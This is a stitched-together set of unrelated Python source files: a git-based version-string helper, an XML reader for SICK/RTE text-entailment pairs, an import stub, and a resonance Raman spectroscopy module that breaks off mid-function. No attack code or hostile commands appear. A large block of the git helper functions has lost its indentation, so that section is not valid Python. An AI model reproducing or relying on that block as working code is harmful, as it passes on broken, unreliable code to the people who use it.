    the project name and a version string. We will also support searching up
    two directory levels for an appropriately named parent directory
    """
    tried = []
    for _ in range(3):
        leaf = os.path.basename(root)
        if leaf.startswith(parentdir_prefix):
            return {"version": leaf[len(parentdir_prefix):],
                    "full-revisionid": None,
                    "dirty": False, "error": None, "date": None}
        tried.append(root)
        root = os.path.dirname(root)  # climb one level and retry
    if verbose:
        print("Tried directories %s but none started with prefix %s" %
              (str(tried), parentdir_prefix))
    raise NotThisMethod("rootdir doesn't start with parentdir_prefix")
@register_vcs_handler("git", "get_keywords")
def git_get_keywords(versionfile_abs):
"""Extract version information from the given file."""
# the code embedded in _version.py can just fetch the value of these
# keywords. When used from setup.py, we don't want to import _version.py,
# so we do it with a regexp instead. This function is not used from
# _version.py.
keywords = {}
try:
f = open(versionfile_abs, "r")
for line in f.readlines():
if line.strip().startswith("git_refnames ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["refnames"] = mo.group(1)
if line.strip().startswith("git_full ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["full"] = mo.group(1)
if line.strip().startswith("git_date ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["date"] = mo.group(1)
f.close()
except EnvironmentError:
pass
return keywords
@register_vcs_handler("git", "keywords")
def git_versions_from_keywords(keywords, tag_prefix, verbose):
"""Get version information from git keywords."""
if not keywords:
raise NotThisMethod("no keywords at all, weird")
date = keywords.get("date")
if date is not None:
# git-2.2.0 added "%cI", which expands to an ISO-8601 -compliant
# datestamp. However we prefer "%ci" (which expands to an "ISO-8601
# -like" string, which we must then edit to make compliant), because
# it's been around since git-1.5.3, and it's too difficult to
# discover which version we're using, or to work around using an
# older one.
date = date.strip().replace(" ", "T", 1).replace(" ", "", 1)
refnames = keywords["refnames"].strip()
if refnames.startswith("$Format"):
if verbose:
print("keywords are unexpanded, not using")
raise NotThisMethod("unexpanded keywords, not a git-archive tarball")
refs = set([r.strip() for r in refnames.strip("()").split(",")])
# starting in git-1.8.3, tags are listed as "tag: foo-1.0" instead of
# just "foo-1.0". If we see a "tag: " prefix, prefer those.
TAG = "tag: "
tags = set([r[len(TAG):] for r in refs if r.startswith(TAG)])
if not tags:
# Either we're using git < 1.8.3, or there really are no tags. We use
# a heuristic: assume all version tags have a digit. The old git %d
# expansion behaves like git log --decorate=short and strips out the
# refs/heads/ and refs/tags/ prefixes that would let us distinguish
# between branches and tags. By ignoring refnames without digits, we
# filter out many common branch names like "release" and
# "stabilization", as well as "HEAD" and "master".
tags = set([r for r in refs if re.search(r'\d', r)])
if verbose:
print("discarding '%s', no digits" % ",".join(refs - tags))
if verbose:
print("likely tags: %s" % ",".join(sorted(tags)))
for ref in sorted(tags):
# sorting will prefer e.g. "2.0" over "2.0rc1"
if ref.startswith(tag_prefix):
r = ref[len(tag_prefix):]
if verbose:
print("picking %s" % r)
return {"version": r,
"full-revisionid": keywords["full"].strip(),
"dirty": False, "error": None,
"date": date}
# no suitable tags, so version is "0+unknown", but full hex is still there
if verbose:
print("no suitable tags, using unknown + full revision id")
return {"version": "0+unknown",
"full-revisionid": keywords["full"].strip(),
"dirty": False, "error": "no suitable tags", "date": None}
@register_vcs_handler("git", "pieces_from_vcs")
def git_pieces_from_vcs(tag_prefix, root, verbose, run_command=run_command):
"""Get version from 'git describe' in the root of the source tree.
This only gets called if the git-archive 'subst' keywords were *not*
expanded, and _version.py hasn't already been rewritten with a short
version string, meaning we're inside a checked out source tree.
"""
GITS = ["git"]
if sys.platform == "win32":
GITS = ["git.cmd", "git.exe"]
out, rc = run_command(GITS, ["rev-parse", "--git-dir"], cwd=root,
hide_stderr=True)
if rc != 0:
if verbose:
print("Directory %s not under git control" % root)
raise NotThisMethod("'git rev-parse --git-dir' returned error")
# if there is a tag matching tag_prefix, this yields TAG-NUM-gHEX[-dirty]
# if there isn't one, this yields HEX[-dirty] (no NUM)
describe_out, rc = run_command(GITS, ["describe", "--tags", "--dirty",
"--always", "--long",
"--match", "%s*" % tag_prefix],
cwd=root)
# --long was added in git-1.5.5
if describe_out is None:
raise NotThisMethod("'git describe' failed")
describe_out = describe_out.strip()
full_out, rc = run_command(GITS, ["rev-parse", "HEAD"], cwd=root)
if full_out is None:
raise NotThisMethod("'git rev-parse' failed")
full_out = full_out.strip()
pieces = {}
pieces["long"] = full_out
pieces["short"] = full_out[:7] # maybe improved later
pieces["error"] = None
# parse describe_out. It will be like TAG-NUM-gHEX[-dirty] or HEX[-dirty]
# TAG might have hyphens.
git_describe = describe_out
# look for -dirty suffix
dirty = git_describe.endswith("-dirty")
pieces["dirty"] = dirty
if dirty:
git_describe = git_describe[:git_describe.rindex("-dirty")]
# now we have TAG-NUM-gHEX or HEX
if "-" in git_describe:
# TAG-NUM-gHEX
mo = re.search(r'^(.+)-(\d+)-g([0-9a-f]+)$', git_describe)
if not mo:
# unparseable. Maybe git-describe is misbehaving?
pieces["error"] = ("unable to parse git-describe output: '%s'"
% describe_out)
return pieces
# tag
full_tag = mo.group(1)
if not full_tag.startswith(tag_prefix):
if verbose:
fmt = "tag '%s' doesn't start with prefix '%s'"
print(fmt % (full_tag, tag_prefix))
pieces["error"] = ("tag '%s' doesn't start with prefix '%s'"
% (full_tag, tag_prefix))
return pieces
pieces["closest-tag"] = full_tag[len(tag_prefix):]
# distance: number of commits since tag
pieces["distance"] = int(mo.group(2))
# commit: short hex revision ID
pieces["short"] = mo.group(3)
else:
# HEX: no tags
pieces["closest-tag"] = None
count_out, rc = run_command(GITS, ["rev-list", "HEAD", "--count"],
cwd=root)
pieces["distance"] = int(count_out) # total number of commits
# commit date: see ISO-8601 comment in git_versions_from_keywords()
date = run_command(GITS, ["show", "-s", "--format=%ci", "HEAD"],
cwd=root)[0].strip()
pieces["date"] = date.strip().replace(" ", "T", 1).replace(" ", "", 1)
return pieces
def plus_or_dot(pieces):
    """Return a + if we don't already have one, else return a ."""
    tag = pieces.get("closest-tag", "")
    return "." if "+" in tag else "+"
def render_pep440(pieces):
    """Build up version string, with post-release "local version identifier".

    Our goal: TAG[+DISTANCE.gHEX[.dirty]] . Note that if you
    get a tagged build and then dirty it, you'll get TAG+0.gHEX.dirty

    Exceptions:
    1: no tags. git_describe was just HEX. 0+untagged.DISTANCE.gHEX[.dirty]
    """
    tag = pieces["closest-tag"]
    if not tag:
        # exception #1: no tag at all, fall back to an untagged local version
        rendered = "0+untagged.%d.g%s" % (pieces["distance"], pieces["short"])
        if pieces["dirty"]:
            rendered += ".dirty"
        return rendered
    rendered = tag
    if pieces["distance"] or pieces["dirty"]:
        rendered += plus_or_dot(pieces)
        rendered += "%d.g%s" % (pieces["distance"], pieces["short"])
        if pieces["dirty"]:
            rendered += ".dirty"
    return rendered
def render_pep440_pre(pieces):
    """TAG[.post.devDISTANCE] -- No -dirty.

    Exceptions:
    1: no tags. 0.post.devDISTANCE
    """
    tag = pieces["closest-tag"]
    if not tag:
        # exception #1: no tag, count from a synthetic "0"
        return "0.post.dev%d" % pieces["distance"]
    if pieces["distance"]:
        return tag + ".post.dev%d" % pieces["distance"]
    return tag
def render_pep440_post(pieces):
    """TAG[.postDISTANCE[.dev0]+gHEX] .
    The ".dev0" means dirty. Note that .dev0 sorts backwards
    (a dirty tree will appear "older" than the corresponding clean one),
    but you shouldn't be releasing software with -dirty anyways.
    Exceptions:
    1: no tags. 0.postDISTANCE[.dev0]
    """
    tag = pieces["closest-tag"]
    if tag:
        out = tag
        if pieces["distance"] or pieces["dirty"]:
            out += ".post%d" % pieces["distance"]
            if pieces["dirty"]:
                out += ".dev0"
            out += plus_or_dot(pieces)
            out += "g%s" % pieces["short"]
        return out
    # exception #1: untagged history -- always carry distance and hash
    out = "0.post%d" % pieces["distance"]
    if pieces["dirty"]:
        out += ".dev0"
    return out + "+g%s" % pieces["short"]
def render_pep440_old(pieces):
    """TAG[.postDISTANCE[.dev0]] .
    The ".dev0" means dirty.
    Exceptions:
    1: no tags. 0.postDISTANCE[.dev0]
    """
    tag = pieces["closest-tag"]
    if tag:
        out = tag
        if pieces["distance"] or pieces["dirty"]:
            out += ".post%d" % pieces["distance"]
            if pieces["dirty"]:
                out += ".dev0"
        return out
    # exception #1: untagged history -- always emit the .post segment
    out = "0.post%d" % pieces["distance"]
    if pieces["dirty"]:
        out += ".dev0"
    return out
def render_git_describe(pieces):
    """TAG[-DISTANCE-gHEX][-dirty].
    Like 'git describe --tags --dirty --always'.
    Exceptions:
    1: no tags. HEX[-dirty] (note: no 'g' prefix)
    """
    tag = pieces["closest-tag"]
    if tag:
        out = tag
        if pieces["distance"]:
            out += "-%d-g%s" % (pieces["distance"], pieces["short"])
    else:
        # exception #1: bare short hash, without the 'g' prefix
        out = pieces["short"]
    return out + "-dirty" if pieces["dirty"] else out
def render_git_describe_long(pieces):
    """TAG-DISTANCE-gHEX[-dirty].
    Like 'git describe --tags --dirty --always -long'.
    The distance/hash is unconditional.
    Exceptions:
    1: no tags. HEX[-dirty] (note: no 'g' prefix)
    """
    tag = pieces["closest-tag"]
    if tag:
        # distance and hash are emitted even for an exact tag match
        out = "%s-%d-g%s" % (tag, pieces["distance"], pieces["short"])
    else:
        out = pieces["short"]
    if pieces["dirty"]:
        out += "-dirty"
    return out
def render(pieces, style):
    """Render the given version pieces into the requested style."""
    if pieces["error"]:
        return {"version": "unknown",
                "full-revisionid": pieces.get("long"),
                "dirty": None,
                "error": pieces["error"],
                "date": None}
    if not style or style == "default":
        style = "pep440"  # the default
    # dispatch table from style name to renderer
    renderers = {
        "pep440": render_pep440,
        "pep440-pre": render_pep440_pre,
        "pep440-post": render_pep440_post,
        "pep440-old": render_pep440_old,
        "git-describe": render_git_describe,
        "git-describe-long": render_git_describe_long,
    }
    if style not in renderers:
        raise ValueError("unknown style '%s'" % style)
    rendered = renderers[style](pieces)
    return {"version": rendered, "full-revisionid": pieces["long"],
            "dirty": pieces["dirty"], "error": None,
            "date": pieces.get("date")}
def get_versions():
    """Get version information or return default if unable to do so."""
    # I am in _version.py, which lives at ROOT/VERSIONFILE_SOURCE. If we have
    # __file__, we can work backwards from there to the root. Some
    # py2exe/bbfreeze/non-CPython implementations don't do __file__, in which
    # case we can only use expanded keywords.
    cfg = get_config()
    verbose = cfg.verbose
    # Strategy 1: expanded VCS keywords (works even without a .git checkout).
    try:
        return git_versions_from_keywords(get_keywords(), cfg.tag_prefix,
                                          verbose)
    except NotThisMethod:
        pass
    # Strategy 2: ask git directly; requires locating the source-tree root.
    try:
        root = os.path.realpath(__file__)
        # versionfile_source is the relative path from the top of the source
        # tree (where the .git directory might live) to this file. Invert
        # this to find the root from __file__.
        for i in cfg.versionfile_source.split('/'):
            root = os.path.dirname(root)
    except NameError:
        # __file__ is undefined (frozen interpreter) -- cannot locate root.
        return {"version": "0+unknown", "full-revisionid": None,
                "dirty": None,
                "error": "unable to find root of source tree",
                "date": None}
    try:
        pieces = git_pieces_from_vcs(cfg.tag_prefix, root, verbose)
        return render(pieces, cfg.style)
    except NotThisMethod:
        pass
    # Strategy 3: parse the version out of the parent directory name.
    try:
        if cfg.parentdir_prefix:
            return versions_from_parentdir(cfg.parentdir_prefix, root, verbose)
    except NotThisMethod:
        pass
    # All strategies failed; report an explicitly unknown version.
    return {"version": "0+unknown", "full-revisionid": None,
            "dirty": None,
            "error": "unable to compute version", "date": None}
|
"""
Common structures and functions used by other scripts.
"""
from xml.etree import cElementTree as ET
# Mapping from textual entailment labels to their integer codes.
str_to_entailment = {
    'none': 0,
    'entailment': 1,
    'paraphrase': 2,
}
# Reverse lookup: integer code -> label.
entailment_to_str = dict((code, label)
                         for label, code in str_to_entailment.items())
class Pair(object):
    '''
    A text/hypothesis pair from the SICK or RTE datasets.

    Serves as an abstract in-memory representation for items of either
    corpus; the entailment label and similarity score may each be None
    when absent from the source file.
    '''
    def __init__(self, t, h, id_, entailment, similarity):
        '''
        :param t: string with the text
        :param h: string with the hypothesis
        :param id_: int indicating id in the original file
        :param entailment: int indicating entailment class
        :param similarity: float
        '''
        self.t, self.h = t, h
        self.id = id_
        self.entailment = entailment
        self.similarity = similarity
def read_xml(filename, need_labels):
    '''
    Read an RTE XML file and return a list of Pair objects.
    :param filename: name of the file to read
    :param need_labels: boolean indicating if labels should be present
    :raise ValueError: if an entailment label is unknown, or if need_labels
        is True and a pair carries neither label nor similarity
    '''
    pairs = []
    tree = ET.parse(filename)
    root = tree.getroot()
    for xml_pair in root.iter('pair'):
        t = xml_pair.find('t').text
        h = xml_pair.find('h').text
        attribs = dict(xml_pair.items())
        id_ = int(attribs['id'])
        if 'entailment' in attribs:
            ent_string = attribs['entailment'].lower()
            try:
                ent_value = str_to_entailment[ent_string]
            except KeyError:
                # BUGFIX: a failed dict lookup raises KeyError, not
                # ValueError; the descriptive message below was unreachable.
                msg = 'Unexpected value for attribute "entailment" at pair {}: {}'
                raise ValueError(msg.format(id_, ent_string))
        else:
            ent_value = None
        if 'similarity' in attribs:
            similarity = float(attribs['similarity'])
        else:
            similarity = None
        if need_labels and similarity is None and ent_value is None:
            msg = 'Missing both entailment and similarity values for pair {}'.format(id_)
            raise ValueError(msg)
        pair = Pair(t, h, id_, ent_value, similarity)
        pairs.append(pair)
    return pairs
|
from edges import EdgeExtractor
from extractor import Extractor
from parambfs import ParamExtractor
|
"""
.. module: FSRStools.rraman
:platform: Windows
.. moduleauthor:: Daniel Dietze <daniel.dietze@berkeley.edu>
Resonance Raman excitation profile calculation based on the time-domain picture of resonance Raman. See Myers and Mathies in *Biological Applications of Raman Spectroscopy*, Vol. 2, pp. 1-58 (John Wiley and Sons, New York, 1987) for details (referred to as Myers in the following). The code is mainly based on Myers' Fortran 77 code (see Appendix of PhD Thesis of K. M. Spillane, 2011, UC Berkeley for source code).
**Changelog:**
*10-7-2015:*
- Added / modified functions for calculating fluorescence spectra.
- Added a convenience function to calculate Raman spectra from a set of excitation profiles.
- Added some more damping functions and phenomenological support for Stokes shift in simple homogeneous damping function.
*10-21-2015:*
- Some bug fixes concerning the prefactors and the normalization of the fluorescence spectra.
- Fixed a bug regarding the Raman overlaps.
**Example Code**
Here is a short example calculating Myers' *Gedankenmolecule* from Myers and Mathies::
import numpy as np
import FSRStools.rraman as rr
# parameters:
# -----------
# displacements
D = np.array([1.27, 0.3, 0.7, 0.53])
# ground state frequencies
RMg = np.array([1550.0, 1300.0, 1150.0, 1000.0])
# excited state frequencies
RMe = np.array([1550.0, 1300.0, 1150.0, 1000.0])
# electronic zero-zero energy
E0 = 20700.0
# homogeneous linewidth and shape parameter
Gamma = 200.0
halpha = 0
# inhomogeneous linewidth and shape parameter
sig = 400.0
ialpha = 1
# electronic transition dipole length
M = 0.8
# index of refraction of surrounding medium
IOR = 1.0
# time axis parameters for integrations
tmax = 5000
dt = 0.2
# just calculate fundamentals
nquanta = np.identity(len(RMg))
sshift = np.dot(nquanta, RMg)
# calculation part
# ----------------
# create axes
t, wn = rr.getAxes(tmax, dt)
# zero-zero energy and damping
# add here all time domain stuff
TDpart = rr.getHomogeneousDamping(t, Gamma, halpha)
# time dependent overlap integrals
OVLPS = rr.getOverlaps(t, D, RMg, RMe, nquanta)
# calculate cross-sections
sigmaA, sigmaR, kF = rr.getCrossSections(t, wn, E0, OVLPS, sshift, M, IOR, TDpart, sig, ialpha)
..
This file is part of the FSRStools python module.
The FSRStools python module is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
The FSRStools python module is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with the FSRStools python module. If not, see <http://www.gnu.org/licenses/>.
Copyright 2014, 2015 Daniel Dietze <daniel.dietze@berkeley.edu>.
"""
import numpy as np
# Physical constants in spectroscopy-friendly units (cm-1, fs, K).
hbar = 5308.880986 #: Planck's constant over 2 pi, hbar, in `cm-1 fs`
c0 = 2.99792458e-5 #: speed of light in `cm / fs`
kB = 0.695 #: Boltzmann's constant in `cm-1 / K`
def radperfs2wn(w):
    """Convert an angular frequency (rad / fs) into a wavenumber (cm-1).
    """
    wavenumber = w * hbar
    return wavenumber
def wn2radperfs(e):
    """Convert a wavenumber (cm-1) into an angular frequency (rad / fs).
    """
    omega = e / hbar
    return omega
def wn2lambda(w):
    """Convert a wavenumber (cm-1) into the corresponding wavelength (nm).
    """
    nm = 1e7 / w
    return nm
def lambda2wn(w):
    """Convert a wavelength (nm) into the corresponding wavenumber (cm-1).
    """
    cm1 = 1e7 / w
    return cm1
def getWnIndex(wn, wn0):
    """Get the index into an array of wavenumbers wn with wavenumber closest to wn0. Use this function for :py:func:`getRamanSpectrum`.

    :param array wn: Wavenumber axis (cm-1).
    :param float wn0: Target wavenumber (cm-1).
    :returns: Index of the element of wn closest to wn0.
    """
    if np.amin(wn) > wn0 or np.amax(wn) < wn0:
        # BUGFIX: print-statement syntax is Python-2 only; a single-argument
        # print() call works identically under Python 2 and 3.
        print("Warning: wn0 lies outside of wn.")
    return np.argmin(np.absolute(wn - wn0))
def getAxes(tmax, dt):
    """Create matching time and frequency axes for the resonance Raman calculations.

    :param float tmax: Endpoint for time domain calculation (fs). This value should be high enough to capture the full dephasing.
    :param float dt: Increment of time axis (fs). This value should be small enough to capture the highest vibronic feature in the excited state.
    :returns: Time axis (fs) and frequency axis (cm-1), both of equal length.
    """
    t = np.arange(0, tmax + dt, dt)
    npts = t.size
    # FFT-conjugate frequency axis in cm-1
    wn = np.arange(npts) / (c0 * dt * npts)
    return t, wn
def molarExtinction2AbsCS(eSpctr, IOR):
    """Convert molar extinction (cm-1 / M) to molecular absorption cross section (A**2 / molec).

    See McHale, Resonance Raman Spectroscopy, Wiley, (2002), p. 545 or Myers & Mathies for details. The absorption cross section in solution has to be scaled by index of refraction unless the molar extinction has not been corrected.

    :param array eSpctr: Extinction spectrum in (cm-1 / M).
    :param float IOR: Index of refraction of surrounding solvent / medium.
    :returns: Absorption spectrum in units of (A**2 / molec.), same shape as eSpcrt.
    """
    # ln(10) converts decadic to natural extinction; 6.0221e23 is Avogadro's
    # number; the two 1e8 factors convert cm**2 to A**2.
    scale = 1e3 * np.log(10.0) / 6.0221e23 * 1e8 * 1e8
    return scale * eSpctr / IOR
def diff2absRamanCS(diffRaCS, rho):
    """Convert the differential Raman cross section (A**2/molec sr) to absolute Raman cross section in (A**2 / molec) for a given depolarization ratio rho.

    :param float diffRaCS: Differential Raman cross section (A**2/molec sr).
    :param float rho: Associated depolarization ratio of this Raman mode.
    :returns: Absolute Raman cross section in (A**2 / molec).
    """
    # solid-angle integration factor for a mode with depolarization ratio rho
    geom = 8.0 * np.pi / 3.0 * (1.0 + 2.0 * rho) / (1.0 + rho)
    return geom * diffRaCS
def getRamanSpectrum(wn, iEL, RMg, nquanta, sigmaR, dw=10.0, alpha=0):
    """
    Convenience function to calculate the Raman spectrum. The spectrum is scattered power per infinitesimal frequency normalized to incident power times molecular density (cm-3) times path length (cm). See Myers, *Chem. Phys.* **180**, 215 (1994), Eq. 7 for details.
    :param array wn: Wavenumber axis (Stokes shift, not electronic).
    :param int iEL: Index into sigmaR corresponding to the pump energy of the laser.
    :param array RMg: Ground state Raman frequencies
    :param array nquanta: M x N array containing the quanta of the N possible Raman modes for the M Raman lines to calculate. Use :py:func:`numpy.identity` to just calculate the fundamentals. Possible values are 0, 1, 2.
    :param array sigmaR: Array of M Raman cross sections that have been calculated by :py:func:`getCrossSections` (in A**2 / molec).
    :param float dw: Phenomenological FWHM linewidth of the Raman lines in cm-1 (default = 10 cm-1).
    :param float alpha: Line shape parameter to be used for the Raman spectrum:
    - 1 = Gaussian
    - 0 = Lorentzian (default)
    :returns: Calculated Raman spectrum (same shape as wn). All-zero if iEL is out of range.
    """
    spectrum = np.zeros(len(wn))
    if iEL < 0 or iEL >= len(sigmaR[0]):
        # BUGFIX: print-statement syntax is Python-2 only; a single-argument
        # print() call works identically under Python 2 and 3.
        print("Error: iEL is out of range!")
        return spectrum
    # iterate over all M modes
    for i, nM in enumerate(nquanta):
        # get frequency of this mode
        wR = np.sum(nM * RMg)
        # add Lorentzian part of lineshape
        spectrum = spectrum + (1.0 - alpha) * sigmaR[i][iEL] * 1e-16 * (dw / (2.0 * np.pi * ((wn - wR)**2 + dw**2 / 4.0)))
        # add Gaussian part of lineshape
        spectrum = spectrum + alpha * sigmaR[i][iEL] * 1e-16 * ((2.0 * np.sqrt(np.log(2) / np.pi)) / dw * np.exp(-4.0 * np.log(2.0) * (wn - wR)**2 / dw**2))
    return spectrum
def t00A(t, Delta, eVIB):
    """Time dependent 0-0 overlap integral between electronic ground and excited state for equal ground- and excited-state vibrational frequencies.

    :param array t: Time axis in (fs).
    :param float Delta: Displacement of excited state potential energy surface along this vibrational coordinate in dimensionless coordinates.
    :param float eVIB: Vibrational frequency (cm-1).
    :returns: 0-0 overlap integral as function of time (same shape as t).
    .. seealso:: Myers, Eqs. (37) - (39).
    """
    # Note: the factors exp(-j w_VIB t) and exp(-j E0 t / hbar) are
    # deliberately omitted; they are applied when the cross sections are
    # assembled.
    phase = np.exp(-1j * eVIB / hbar * t)
    return np.exp(-Delta**2 / 2.0 * (1.0 - phase))
def t10A(t, Delta, eVIB):
    """Time dependent 1-0 overlap integral between electronic ground and excited state for equal ground- and excited-state vibrational frequencies.

    :param array t: Time axis in (fs).
    :param float Delta: Displacement of excited state potential energy surface along this vibrational coordinate in dimensionless coordinates.
    :param float eVIB: Vibrational frequency (cm-1).
    :returns: 1-0 overlap integral as function of time (same shape as t). Multiply by t00A for the full overlap.
    .. seealso:: Myers, Eqs. (37) - (39).
    """
    # relative part only; the common t00A factor is applied by the caller
    phase = np.exp(-1j * eVIB / hbar * t)
    return Delta / np.sqrt(2) * (phase - 1.0)
def t20A(t, Delta, eVIB):
    """Time dependent 2-0 overlap integral between electronic ground and excited state for equal ground- and excited-state vibrational frequencies.

    :param array t: Time axis in (fs).
    :param float Delta: Displacement of excited state potential energy surface along this vibrational coordinate in dimensionless coordinates.
    :param float eVIB: Vibrational frequency (cm-1).
    :returns: 2-0 overlap integral as function of time (same shape as t). Multiply by t00A for the full overlap.
    .. seealso:: Myers, Eqs. (37) - (39).
    """
    # relative part only; the common t00A factor is applied by the caller
    phase = np.exp(-1j * eVIB / hbar * t)
    return Delta**2 / (2 * np.sqrt(2)) * (phase - 1.0)**2
def t00B(t, Delta, eg, ee):
    """Time dependent overlap integral between vibrational ground states of electronic ground and excited state with different ground and excited state vibrational frequencies.
    :param array t: Time axis in (fs).
    :param float Delta: Displacement of excited state potential energy surface along this vibrational coordinate in dimensionless coordinates.
    :param float eg: Vibrational frequency in the ground state (cm-1).
    :param float ee: Vibrational frequency in the excited state (cm-1).
    :returns: 0-0 overlap integral as function of time (same shape as t).
    .. seealso:: Myers, Eqs. (42) - (44).
    """
    wg = eg / hbar  # ground-state angular frequency (rad / fs)
    we = ee / hbar  # excited-state angular frequency (rad / fs)
    swe = np.sin(we * t)
    cwe = np.cos(we * t)
    # classical momentum p(t) and position q(t) of the excited-state wavepacket
    pt = we / wg * Delta * swe
    qt = Delta * (1 - cwe)
    # the log reduces to 0.5 * eg / hbar * t when eg = ee
    # this is the factor that is taken out in the t00A case, as it cancels with the exp in the integral later on
    # however, np.log returns values such that -pi < arg(log(..)) < pi
    gt = 1j / 2.0 * np.log(1j * wg / we * swe + cwe) + pt * (qt - Delta) / 2.0 # skip -E0 t / hbar
    # add the following term to recover t00A for eg = ee
    gt = gt - 1j / 2.0 * np.log(1j * np.sin(wg * t) + np.cos(wg * t))
    at = -0.5 * 1j * (1j * cwe - (we / wg) * swe) / (1j * (wg / we) * swe + cwe)
    a = at + 0.5
    pp = pt - 2.0 * 1j * at * qt
    gp = 1j * at * qt**2 - pt * qt + gt
    # assemble the Gaussian-wavepacket overlap (Myers, Eq. (42))
    return a**(-0.5) * np.exp(-pp**2 / (4.0 * a)) * np.exp(1j * gp)
def t10B(t, Delta, eg, ee):
    """Time dependent overlap integral between vibrational ground and first excited state of electronic ground and excited state with different ground and excited state vibrational frequencies.
    :param array t: Time axis in (fs).
    :param float Delta: Displacement of excited state potential energy surface along this vibrational coordinate in dimensionless coordinates.
    :param float eg: Vibrational frequency in the ground state (cm-1).
    :param float ee: Vibrational frequency in the excited state (cm-1).
    :returns: 1-0 overlap integral as function of time (same shape as t). Multiply by t00B for the full overlap.
    .. seealso:: Myers, Eqs. (42) - (44).
    """
    wg = eg / hbar  # ground-state angular frequency (rad / fs)
    we = ee / hbar  # excited-state angular frequency (rad / fs)
    swe = np.sin(we * t)
    cwe = np.cos(we * t)
    # classical momentum p(t) and position q(t) of the excited-state wavepacket
    pt = we / wg * Delta * swe
    qt = Delta * (1 - cwe)
    at = -0.5 * 1j * (1j * cwe - (we / wg) * swe) / (1j * (wg / we) * swe + cwe)
    a = at + 0.5
    pp = pt - 2.0 * 1j * at * qt
    return 2**(-0.5) * pp / (1j * a) # * t00B(t, Delta, eg, ee)
def t20B(t, Delta, eg, ee):
    """Time dependent overlap integral between vibrational ground and second excited state of electronic ground and excited state with different ground and excited state vibrational frequencies.
    :param array t: Time axis in (fs).
    :param float Delta: Displacement of excited state potential energy surface along this vibrational coordinate in dimensionless coordinates.
    :param float eg: Vibrational frequency in the ground state (cm-1).
    :param float ee: Vibrational frequency in the excited state (cm-1).
    :returns: 2-0 overlap integral as function of time (same shape as t). Multiply by t00B for the full overlap.
    .. seealso:: Myers, Eqs. (42) - (44).
    """
    wg = eg / hbar  # ground-state angular frequency (rad / fs)
    we = ee / hbar  # excited-state angular frequency (rad / fs)
    swe = np.sin(we * t)
    cwe = np.cos(we * t)
    # classical momentum p(t) and position q(t) of the excited-state wavepacket
    pt = we / wg * Delta * swe
    qt = Delta * (1 - cwe)
    at = -0.5 * 1j * (1j * cwe - (we / wg) * swe) / (1j * (wg / we) * swe + cwe)
    a = at + 0.5
    pp = pt - 2.0 * 1j * at * qt
    return -8**(-0.5) * (pp**2 / a**2 + 2. * (1. - 1. / a)) # * t00B(t, Delta, eg, ee)
def t00D(t, beta, eVIB):
    """Time dependent 0-0 overlap integral for a linear dissociative excited state surface along this vibrational coordinate.

    :param array t: Time axis in (fs).
    :param float beta: Slope of excited state potential energy surface (dV / dq) in (cm-1) (q is dimensionless coordinate).
    :param float eVIB: Vibrational frequency (cm-1).
    :returns: 0-0 overlap integral as function of time (same shape as t).
    .. seealso:: Myers, Eqs. (52) - (54).
    """
    root = (1.0 + 1j * eVIB / hbar * t / 2.0)**(-0.5)
    decay = np.exp(-beta**2 * (6 * t**2 + 1j * eVIB / hbar * t**3) / (24 * hbar**2))
    # compensate for the -1j w t / 2 term coming from the FFT convention
    comp = np.exp(1j * eVIB / hbar * t / 2.0)
    return root * decay * comp
def t10D(t, beta, eVIB):
    """Time dependent 1-0 overlap integral for a linear dissociative excited state surface along this vibrational coordinate.

    :param array t: Time axis in (fs).
    :param float beta: Slope of excited state potential energy surface (dV / dq) in (cm-1) (q is dimensionless coordinate).
    :param float eVIB: Vibrational frequency (cm-1).
    :returns: 1-0 overlap integral as function of time (same shape as t). Multiply by t00D for the full overlap.
    .. seealso:: Myers, Eqs. (52) - (54).
    """
    # relative part only; the common t00D factor is applied by the caller
    slope_term = beta * t / hbar
    return -1j * 2**(-0.5) * slope_term
def t20D(t, beta, eVIB):
    """Time dependent 2-0 overlap integral for a linear dissociative excited state surface along this vibrational coordinate.

    :param array t: Time axis in (fs).
    :param float beta: Slope of excited state potential energy surface (dV / dq) in (cm-1) (q is dimensionless coordinate).
    :param float eVIB: Vibrational frequency (cm-1).
    :returns: 2-0 overlap integral as function of time (same shape as t). Multiply by t00D for the full overlap.
    .. seealso:: Myers, Eqs. (52) - (54).
    """
    # relative part only; the common t00D factor is applied by the caller
    wt = 1j * eVIB / hbar * t
    return -2**(-0.5) * (beta**2 * t**2 / (2.0 * hbar**2) - wt / (2.0 + wt))
def getOverlaps(t, D, RMg, RMe, nquanta):
    """Calculate the time dependent overlap integrals / Franck-Condon factors :math:`<i|i(t)>_k` and :math:`<f|i(t)>_k`.
    .. versionchanged:: 10-07-2015
    Format of return value changed.
    :param array t: Time axis in (fs).
    :param array D: Array of N normalized displacements of excited state surfaces (deltas), or slope of linear dissociative excited state surface.
    :param array RMg: N Raman ground state frequencies (cm-1).
    :param array RMe: N Raman excited state frequencies (cm-1) or -1 if excited state surface is dissociative.
    :param array nquanta: M x N array containing the quanta of the N possible Raman modes for the M Raman lines to calculate. Use :py:func:`numpy.identity` to just calculate the fundamentals. Possible values are 0 (no excitation), 1 (fundamental), 2 (first overtone).
    :returns: M + 2 - dimensional array containing the Rayleigh, fluorescence and M Raman overlaps.
    """
    ovlps = []
    N = len(D)  # number of vibrational modes
    M = nquanta.shape[0]  # number of Raman lines to compute
    # Frank-Condon factors <i|i(t)>_k and <f|i(t)>_k
    FC0 = []   # per-mode 0-0 absorption overlaps
    FC0p = []  # per-mode 0-0 fluorescence overlaps
    FC1 = []   # per-mode 1-0 overlaps (fundamentals)
    FC2 = []   # per-mode 2-0 overlaps (first overtones)
    for i in range(N):
        if(RMg[i] == RMe[i]):
            # equal ground / excited frequencies: A-type expressions
            FC0.append(t00A(t, D[i], RMg[i]))
            FC0p.append(FC0[-1])  # fluorescence overlap is identical to absorption overlap when frequencies are equal
            FC1.append(t10A(t, D[i], RMg[i]))
            FC2.append(t20A(t, D[i], RMg[i]))
        elif(RMe[i] == -1):
            # dissociative excited-state surface: D-type expressions
            FC0.append(t00D(t, D[i], RMg[i]))
            FC0p.append(np.zeros(len(t)))  # fluorescence is negligible from dissociative surface
            FC1.append(t10D(t, D[i], RMg[i]))
